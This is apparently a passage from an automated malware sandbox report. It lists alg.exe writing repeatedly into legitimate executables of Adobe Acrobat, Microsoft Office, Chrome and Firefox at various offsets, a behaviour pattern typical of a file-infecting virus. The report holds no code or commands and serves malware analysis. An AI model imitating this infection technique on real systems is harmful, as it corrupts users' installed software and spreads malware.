Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 1755648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329088	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 740604	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3347968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 1777084	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 6470144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 2807964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 6470144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 2807964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 1665536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2239052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2238976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 853340	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 1861120	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434636	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434560	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 910188	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1445888	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019404	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019328	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 728892	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272	Jump to behavior
